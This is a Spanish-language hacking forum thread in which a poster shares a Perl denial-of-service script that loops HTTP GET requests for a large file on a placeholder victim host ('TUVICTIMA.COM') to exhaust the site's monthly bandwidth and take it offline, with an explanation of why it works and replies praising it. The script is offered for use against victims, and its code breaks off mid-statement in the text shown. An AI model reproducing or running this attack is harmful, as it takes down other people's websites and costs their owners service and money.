Simple Denial Of Service

Iniciado por ANTRAX, Febrero 18, 2010, 12:10:06 PM

Tema anterior - Siguiente tema

0 Miembros y 2 Visitantes están viendo este tema.

Este es un simple script que forma peticiones (GET) constantes a un Determinado Archivo alojado en un Servidor X (X = Victima) , hasta agotar su Bandwidth (Ancho de Banda) y cumplir con el ovjetivo de dejar Off-Line al Servidor especificado.

Yo lo he probado y puedo decirles que funciona muy bien.

NOTAS :

Les explico mas o menos como trabaja y funciona esto para aquellos que no conoscan bien de que se trata el DoS. Cada sitio tiene un limite de transferencia mensual mas conocido como bandwidth, cuando se adquiere un host te dan cierto limite, y cuando execedes esa transferencia tu pagina se vuelve inaccesible al publico mostrando un error.Dejandola inactiva hasta el mes Proximo. Por lo general la transferencia mensual de un server mas o menos comunacho de 8 a 15Gb de bandwidth mensual,uno podria pensar que eso es mas que suficiente para un sitio con pocas visitas, pues el ancho de banda se gasta cada que alguien descarga algun archivo de la pagina,ya sean imagenes,codigo,zip's, etc, cualquier archivo que descargues gasta el ancho de banda. Lo interesante es que no es necesario "descargar" propiamente el archivo del servidor, basta con hacer la peticion en este caso GET, con eso bastara para que el servidor piense que han descargado el archivo y disminuya el ancho de banda disponible del mes.
Este sencillo script permite hacer las peticiones,simplemente tienes que buscar la ruta de algun archivo pesado en el servidor (mientras mas pesado, mas rapido terminaras), y el script nos muestra la respuesta del servidor como lo mostrare en el siguiente Code:

Código: php
HTTP: 1.0 200 OK



Cuando nos aparezca el ultimo mensaje (509 o 505 bandwidth limit exceeded , mision cumplida ,habremos dejado offline el sitio por el resto del mes.

Aqui les dejo el Codigo


Código: php
#!/usr/bin/perl
#Escrito por Megababa
# Solo busca la ruta de algun archivo pesado y listo # Algunos lo llaman Magia,yo simplemente NIVEL.
use IO::Socket;
use strict; print q( #########Desmadrador de Transferencia Mensual############# #########by Megabyte############## );
for(0..1000) { my($eliteador); my($SOCKET) = new IO::Socket::INET( Proto => "tcp", PeerAddr=> "TUVICTIMA.COM:80");
if (! defined $SOCKET) { die $!; } print $SOCKET "GET http://TUVICTIMA.COM/ARCHIVO.RAR HTTP/1.0\n\n"; $eliteador =


fuente - fuck-cls



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
En que lengua

Perl... Gracias ANTRAX buen code...


Saludos

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

codigo sencillo, pero efectivo! muy bueno